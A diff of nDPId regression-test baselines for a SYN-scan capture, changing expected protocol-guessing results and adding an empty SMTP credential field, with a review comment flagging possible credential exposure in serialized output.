@@ -1499,7 +1499,6 @@ 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsJgwAACcG+2asEAAIQA2GNIzSBDDdUoMYAAAAAGACEAAkXwAAAgQFtA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AACcGKcSsEAAIQA2GNIzSE4ndUoMYAAAAAGACEAAVBgAAAgQFtA=="} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsirUAADEGjL2sEAAIQA2GNIzSH\/XdUoMYAAAAAGACCAAQmgAAAgQFtA=="} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -1630,7 +1629,6 @@ 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5EAACoGXuGsEAAIQA2GNIzTH\/XdU4MZAAAAAGACDAAMlwAAAgQFtA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsciYAADQGokysEAAIQA2GNIzTE4ndU4MZAAAAAGACBAAhAwAAAgQFtA=="} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs7U0AACoGMSWsEAAIQA2GNIzTBDDdU4MZAAAAAGACDAAoXAAAAgQFtA=="} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -6371,9 +6369,9 @@ 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
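Review bot: The two added `guessed` events for dst_port 587 (flow_id 8 and 22) now carry an `"smtp": {"user":"","password":""}` object, so the expected event schema gains a `password` key on flow events. The values are empty here because these are payload-less SYN flows, but if the serializer fills that key from cleartext SMTP AUTH traffic (the serializer is not visible on this page, so this is inferred), every consumer of the JSON stream and every log that stores it would hold mail credentials. I would rather have the baseline pin the object's absence when both fields are empty, i.e. the lines ending `"proto":"SMTP","breed":"Acceptable","category":"Email"}}`, and have populated passwords redacted or gated behind an explicit option before serialization. The same lines also switch the port-587 guess from `SMTPS`/`Safe` to `SMTP`/`Acceptable`, which is worth confirming as intended because alerting rules keyed on `breed` or `proto` will see the change.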
@@ -6849,10 +6847,12 @@ 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -7987,18 +7987,18 @@ 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","packets-captured":2011,"packets-processed":2011,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":1876,"total-guessed-flows":116,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1994,"total-idle-flows":1994,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7990,"global_ts_msec":1278275079360} +00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","packets-captured":2011,"packets-processed":2011,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":1876,"total-guessed-flows":118,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1994,"total-idle-flows":1994,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7990,"global_ts_msec":1278275079360} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2011/2011 ~~ skipped flows.............: 0 ~~ total layer4 data length..: 0 bytes -~~ total detected protocols..: 2 +~~ total detected protocols..: 0 ~~ total active/idle flows...: 1994/1994 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 8040362 bytes -~~ total memory freed........: 8040362 bytes -~~ total allocations/frees...: 128099/128099 +~~ total memory allocated....: 8173996 bytes +~~ total memory freed........: 8173996 bytes +~~ total allocations/frees...: 130861/130861 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 820 chars 
diff --git a/test/results/syslog.pcap.out b/test/results/syslog.pcap.out index 9e432f4bc..e47d1dce5 100644 --- a/test/results/syslog.pcap.out +++ b/test/results/syslog.pcap.out 
